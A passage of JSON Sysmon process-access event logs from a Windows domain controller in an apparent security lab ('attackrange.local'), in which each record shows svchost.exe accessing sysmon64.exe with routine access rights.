dll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6112,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.773\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.773","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6113,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.773\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.773","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6114,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.773\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.773","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6115,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.773\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.773","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6116,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.773\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.773","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6117,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.773\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.773","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6118,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.773\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.773","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6119,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.773\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.773","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
